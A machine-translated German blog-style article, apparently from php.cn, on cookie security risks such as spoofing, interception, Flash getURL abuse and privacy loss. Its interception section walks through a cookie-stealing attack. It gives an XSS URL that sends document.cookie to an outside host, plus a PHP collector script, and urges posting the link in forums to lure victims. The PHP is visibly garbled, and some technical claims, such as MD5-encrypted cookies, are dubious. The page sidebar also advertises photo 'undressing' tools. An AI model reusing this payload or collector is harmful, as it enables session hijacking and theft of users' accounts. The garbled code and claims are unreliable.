Heim Web-Frontend js-Tutorial Eingehende Analyse von Cookie-Sicherheitsproblemen_Cookies

Eingehende Analyse von Cookie-Sicherheitsproblemen_Cookies

May 16, 2016 pm 04:12 PM
cookie 安全性

Der Zweck von Cookies besteht darin, den Benutzern Komfort zu bieten und einen Mehrwert für die Website zu schaffen. Unter normalen Umständen stellen sie keine ernsthaften Sicherheitsrisiken dar. Cookie-Dateien können nicht als Code ausgeführt werden und keine Viren übertragen. Sie sind Eigentum des Benutzers und können nur von dem Server gelesen werden, der sie erstellt hat. Darüber hinaus erlauben Browser im Allgemeinen nur das Speichern von 300 Cookies und jede Website kann bis zu 20 Cookies speichern. Die Größe jedes Cookies ist auf 4 KB begrenzt. Daher füllen Cookies nicht die Festplatte und werden nicht als solche verwendet ein „Denial of Service“-Angriff.

Anstelle der Benutzeridentität bestimmt jedoch manchmal die Sicherheit von Cookies die Sicherheit des gesamten Systems, und die Sicherheitsprobleme von Cookies können nicht ignoriert werden.

(1) Cookie-Spoofing Cookies erfassen Informationen wie Benutzerkonto-IDs und Passwörter und werden in der Regel mit der MD5-Methode verschlüsselt, bevor sie online übertragen werden. Selbst wenn die verschlüsselten Informationen von einigen Personen mit Hintergedanken im Internet abgefangen werden, können sie nicht verstanden werden. Das Problem besteht nun jedoch darin, dass die Person, die das Cookie abfängt, die Bedeutung dieser Zeichenfolgen nicht kennen muss. Solange sie die Cookies anderer Personen an den Server übermittelt und die Überprüfung bestehen kann, kann sie sich als Opfer ausgeben und sich anmelden Dieses Verhalten nennt man Cookies-Cheat.
Illegale Benutzer erhalten durch Cookie-Täuschung entsprechende Verschlüsselungsschlüssel und greifen so auf alle personalisierten Informationen legitimer Benutzer zu, einschließlich der E-Mails der Benutzer und sogar Kontoinformationen, was zu schwerem Schaden an persönlichen Daten führt.
(2) Cookie-Abfangen
Cookies werden in Form von Klartext zwischen dem Browser und dem Server übertragen und können leicht von anderen illegal abgefangen und verwendet werden. Cookies können von jedem gelesen werden, der Webkommunikation abfangen kann.
Nachdem ein Cookie von einem illegalen Benutzer abgefangen und dann innerhalb seiner Gültigkeitsdauer abgespielt wurde, genießt der illegale Benutzer die Rechte eines legalen Benutzers. Beim Online-Lesen können beispielsweise illegale Benutzer elektronische Zeitschriften online lesen, ohne dafür Gebühren zu zahlen.

Cookie-Abfangmethoden umfassen Folgendes:

(1) Verwenden Sie Programmierung, um Cookies abzufangen. Die Methode wird im Folgenden analysiert. Die Methode wird in zwei Schritten durchgeführt.

Schritt 1: Suchen Sie die Website, die Cookies sammeln muss, analysieren Sie sie und erstellen Sie die URL. Öffnen Sie zunächst die Website, auf der Sie Cookies sammeln möchten. Melden Sie sich auf der Website an und geben Sie den Benutzernamen „“ ein und erfassen Sie die Pakete und erhalten Sie den folgenden Code:
http://www.XXX.net/tXl/login/login.pl? Benutzername=&passwd=&ok.X=28&ok.y=6;
Ersetzen Sie „“ durch:
„<script>alert(document.cookie)</script>“ Wenn die Ausführung erfolgreich ist, beginnen Sie mit der Erstellung der URL:
http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Unter anderem ist http://www.cbifamily.org/cbi.php ein Skript auf einem bestimmten Host, das der Benutzer steuern kann. Beachten Sie, dass „+“ die URL-Kodierung des Symbols „ “ ist, da „ “ als Leerzeichen behandelt wird. Die URL kann im Forum gepostet werden, um andere zum Klicken zu bewegen.

Schritt 2: Bereiten Sie ein PHP-Skript vor, das Cookies sammelt, und platzieren Sie es auf einer Website, die der Benutzer kontrollieren kann. Wenn eine ahnungslose Person auf die erstellte URL klickt, kann der PHP-Code ausgeführt werden. Der spezifische Inhalt des Skripts lautet wie folgt:

Code kopieren Der Code lautet wie folgt:

$info=getenv("OUERY_STRING");
if($info){
$fp=fopen("info.tXt","a"); fwrite($fp,!info."n"); fclose($fp);

header("Location:http://www.XXX.net");
?>

Stellen Sie diesen Code ins Netzwerk und Sie können die Cookies aller sammeln. Wenn ein Forum HTML-Code oder die Verwendung von Flash-Tags zulässt, können Sie mithilfe dieser Technologien Cookie-Code sammeln und in das Forum einfügen, dem Beitrag dann ein attraktives Thema geben und interessante Inhalte schreiben, und Sie können schnell eine große Anzahl sammeln von Cookies. Im Forum wurden die Passwörter vieler Leute auf diese Weise gestohlen.
(2) Nutzen Sie die verborgenen Gefahren von Flash-Code, um Cookies abzufangen. In Flash gibt es eine getURL()-Funktion. Flash kann diese Funktion nutzen, um automatisch eine bestimmte Webseite zu öffnen, wodurch Benutzer möglicherweise auf eine Website mit Schadcode weitergeleitet werden. Wenn ein Benutzer beispielsweise eine Flash-Animation auf einem Computer genießt, hat sich der Code im Animationsrahmen möglicherweise stillschweigend mit dem Internet verbunden und eine sehr kleine Seite mit speziellem Code geöffnet. Diese Seite kann Cookies sammeln und andere schädliche Dinge tun. Dinge. Websites können dies nicht verhindern, da Flash eine interne Funktion der Flash-Datei ist.
(3) Cookies gefährden die Privatsphäre im Netzwerk
Der Hauptgrund, warum Cookies zu Datenschutzverlusten im Internet führen, ist: Sie werden durch kommerzielle Interessen getrieben. Mit dem Aufstieg des E-Commerce und der Entstehung enormer Geschäftsmöglichkeiten im Internet missbrauchen einige Websites und Institutionen Cookies und nutzen Suchmaschinentechnologie, Data-Mining-Technologie und sogar Netzwerktäuschungstechnologie, um ohne die Erlaubnis des Besuchers persönliche Daten anderer Personen zu sammeln um Benutzerdatenbanken, Werbung und andere gewinnbringende Zwecke aufzubauen, was zu einem Verlust der Privatsphäre der Benutzer führt. „Die Offenheit der Übertragung von Cookie-Informationen. Cookie-Dateien verfügen über spezielle Übertragungsverfahren und Texteigenschaften. Die Übertragung unsicher verschlüsselter Cookie-Dateien zwischen dem Server und dem Client kann leicht zum Verlust persönlicher Informationen führen.

Das Obige ist mein persönliches Verständnis der Cookie-Sicherheit. Bitte korrigieren Sie mich, wenn es Auslassungen gibt.

Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn

Heiße KI -Werkzeuge

Undresser.AI Undress

Undresser.AI Undress

KI-gestützte App zum Erstellen realistischer Aktfotos

AI Clothes Remover

AI Clothes Remover

Online-KI-Tool zum Entfernen von Kleidung aus Fotos.

Undress AI Tool

Undress AI Tool

Ausziehbilder kostenlos

Clothoff.io

Clothoff.io

KI-Kleiderentferner

Video Face Swap

Video Face Swap

Tauschen Sie Gesichter in jedem Video mühelos mit unserem völlig kostenlosen KI-Gesichtstausch-Tool aus!

Heiße Werkzeuge

Notepad++7.3.1

Notepad++7.3.1

Einfach zu bedienender und kostenloser Code-Editor

SublimeText3 chinesische Version

SublimeText3 chinesische Version

Chinesische Version, sehr einfach zu bedienen

Senden Sie Studio 13.0.1

Senden Sie Studio 13.0.1

Leistungsstarke integrierte PHP-Entwicklungsumgebung

Dreamweaver CS6

Dreamweaver CS6

Visuelle Webentwicklungstools

SublimeText3 Mac-Version

SublimeText3 Mac-Version

Codebearbeitungssoftware auf Gottesniveau (SublimeText3)

Leistung und Sicherheit von PHP5 und PHP8: Vergleich und Verbesserungen Leistung und Sicherheit von PHP5 und PHP8: Vergleich und Verbesserungen Jan 26, 2024 am 10:19 AM

PHP ist eine weit verbreitete serverseitige Skriptsprache zur Entwicklung von Webanwendungen. Es hat sich zu mehreren Versionen entwickelt, und in diesem Artikel wird hauptsächlich der Vergleich zwischen PHP5 und PHP8 besprochen, wobei ein besonderer Schwerpunkt auf den Verbesserungen bei Leistung und Sicherheit liegt. Werfen wir zunächst einen Blick auf einige Funktionen von PHP5. PHP5 wurde 2004 veröffentlicht und führte viele neue Funktionen und Features ein, wie z. B. objektorientierte Programmierung (OOP), Ausnahmebehandlung, Namespaces usw. Diese Funktionen machen PHP5 leistungsfähiger und flexibler und ermöglichen es Entwicklern

Sicherheitsherausforderungen bei der Golang-Entwicklung: Wie kann verhindert werden, dass es zur Virenentstehung ausgenutzt wird? Sicherheitsherausforderungen bei der Golang-Entwicklung: Wie kann verhindert werden, dass es zur Virenentstehung ausgenutzt wird? Mar 19, 2024 pm 12:39 PM

Sicherheitsherausforderungen bei der Golang-Entwicklung: Wie kann verhindert werden, dass es zur Virenentstehung ausgenutzt wird? Aufgrund der breiten Anwendung von Golang im Bereich der Programmierung entscheiden sich immer mehr Entwickler für die Verwendung von Golang zur Entwicklung verschiedener Arten von Anwendungen. Allerdings gibt es wie bei anderen Programmiersprachen auch bei der Golang-Entwicklung Sicherheitsherausforderungen. Insbesondere seine Leistungsfähigkeit und Flexibilität machen Golang auch zu einem potenziellen Werkzeug zur Virenerstellung. Dieser Artikel befasst sich mit Sicherheitsproblemen bei der Golang-Entwicklung und bietet einige Methoden zur Vermeidung von G

Welche Beziehung besteht zwischen Speicherverwaltungstechniken und Sicherheit in Java-Funktionen? Welche Beziehung besteht zwischen Speicherverwaltungstechniken und Sicherheit in Java-Funktionen? May 02, 2024 pm 01:06 PM

Die Speicherverwaltung in Java umfasst die automatische Speicherverwaltung, wobei Garbage Collection und Referenzzählung zum Zuweisen, Verwenden und Freigeben von Speicher verwendet werden. Eine effektive Speicherverwaltung ist für die Sicherheit von entscheidender Bedeutung, da sie Pufferüberläufe, wilde Zeiger und Speicherlecks verhindert und so die Sicherheit Ihres Programms verbessert. Durch die ordnungsgemäße Freigabe nicht mehr benötigter Objekte können Sie beispielsweise Speicherlecks vermeiden, wodurch die Programmleistung verbessert und Abstürze verhindert werden.

Detaillierte Erklärung, wo Browser-Cookies gespeichert werden Detaillierte Erklärung, wo Browser-Cookies gespeichert werden Jan 19, 2024 am 09:15 AM

Mit der Popularität des Internets ist die Verwendung von Browsern zum Surfen im Internet zu einer Lebensweise geworden. Bei der täglichen Verwendung von Browsern stoßen wir häufig auf Situationen, in denen wir Kontokennwörter eingeben müssen, z. B. beim Online-Shopping, bei sozialen Netzwerken, bei E-Mails usw. Diese Informationen müssen vom Browser aufgezeichnet werden, damit sie bei Ihrem nächsten Besuch nicht erneut eingegeben werden müssen. Was sind Cookies? Bei einem Cookie handelt es sich um eine kleine Datendatei, die vom Server an den Browser des Benutzers gesendet und lokal gespeichert wird. Sie enthält das Benutzerverhalten einiger Websites.

Muss Win11 Antivirensoftware installieren? Muss Win11 Antivirensoftware installieren? Dec 27, 2023 am 09:42 AM

Win11 wird mit einer Antivirensoftware geliefert, die im Allgemeinen sehr gut ist und nicht installiert werden muss. Der einzige Nachteil besteht darin, dass Sie sehen, dass der Virus zuerst deinstalliert wird, anstatt Sie im Voraus daran zu erinnern Sie benötigen es. Wenn Sie es akzeptieren, müssen Sie es nicht herunterladen. Muss Win11 Antivirensoftware installieren? Antwort: Nein. Im Allgemeinen wird Win11 mit Antivirensoftware geliefert und erfordert keine zusätzliche Installation. Wenn Ihnen die Handhabung der mit dem Win11-System gelieferten Antivirensoftware nicht gefällt, können Sie diese neu installieren. So deaktivieren Sie die mit win11 gelieferte Antivirensoftware: 1. Zuerst geben wir die Einstellungen ein und klicken auf „Datenschutz und Sicherheit“. 2. Klicken Sie dann auf „Windows-Sicherheitscenter“. 3. Wählen Sie dann „Viren- und Bedrohungsschutz“. 4. Schließlich können Sie es ausschalten

Häufig gestellte Fragen und Lösungen zu Cookie-Einstellungen Häufig gestellte Fragen und Lösungen zu Cookie-Einstellungen Jan 19, 2024 am 09:08 AM

Für häufige Probleme und Lösungen für Cookie-Einstellungen sind spezifische Codebeispiele erforderlich. Mit der Entwicklung des Internets wurden Cookies als eine der häufigsten herkömmlichen Technologien in großem Umfang in Websites und Anwendungen eingesetzt. Einfach ausgedrückt handelt es sich bei einem Cookie um eine Datendatei, die auf dem Computer des Benutzers gespeichert wird und zum Speichern der Benutzerinformationen auf der Website verwendet werden kann, einschließlich Anmeldename, Inhalt des Warenkorbs, Website-Präferenzen usw. Cookies sind ein unverzichtbares Werkzeug für Entwickler, gleichzeitig werden jedoch häufig Cookie-Einstellungen vorgenommen

So finden Sie Cookies in Ihrem Browser So finden Sie Cookies in Ihrem Browser Jan 19, 2024 am 09:46 AM

Bei unserer täglichen Nutzung von Computern und dem Internet sind wir häufig Cookies ausgesetzt. Ein Cookie ist eine kleine Textdatei, die Aufzeichnungen über unsere Besuche auf der Website, Präferenzen und andere Informationen speichert. Diese Informationen können von der Website verwendet werden, um uns besser bedienen zu können. Aber manchmal müssen wir Cookie-Informationen finden, um den gewünschten Inhalt zu finden. Wie finden wir also Cookies im Browser? Zuerst müssen wir verstehen, wo sich das Cookie befindet. im Browser

Sicherheitsanalyse des Oracle-Standardkontokennworts Sicherheitsanalyse des Oracle-Standardkontokennworts Mar 09, 2024 pm 04:24 PM

Oracle-Datenbank ist ein beliebtes relationales Datenbankverwaltungssystem. Viele Unternehmen und Organisationen entscheiden sich für die Verwendung von Oracle zum Speichern und Verwalten ihrer wichtigen Daten. In der Oracle-Datenbank gibt es einige vom System voreingestellte Standardkonten und Passwörter, z. B. sys, system usw. Bei der täglichen Datenbankverwaltung sowie bei Betriebs- und Wartungsarbeiten müssen Administratoren auf die Sicherheit dieser Standardkontokennwörter achten, da diese Konten über höhere Berechtigungen verfügen und bei böswilliger Ausnutzung schwerwiegende Sicherheitsprobleme verursachen können. In diesem Artikel wird der Oracle-Standard behandelt

See all articles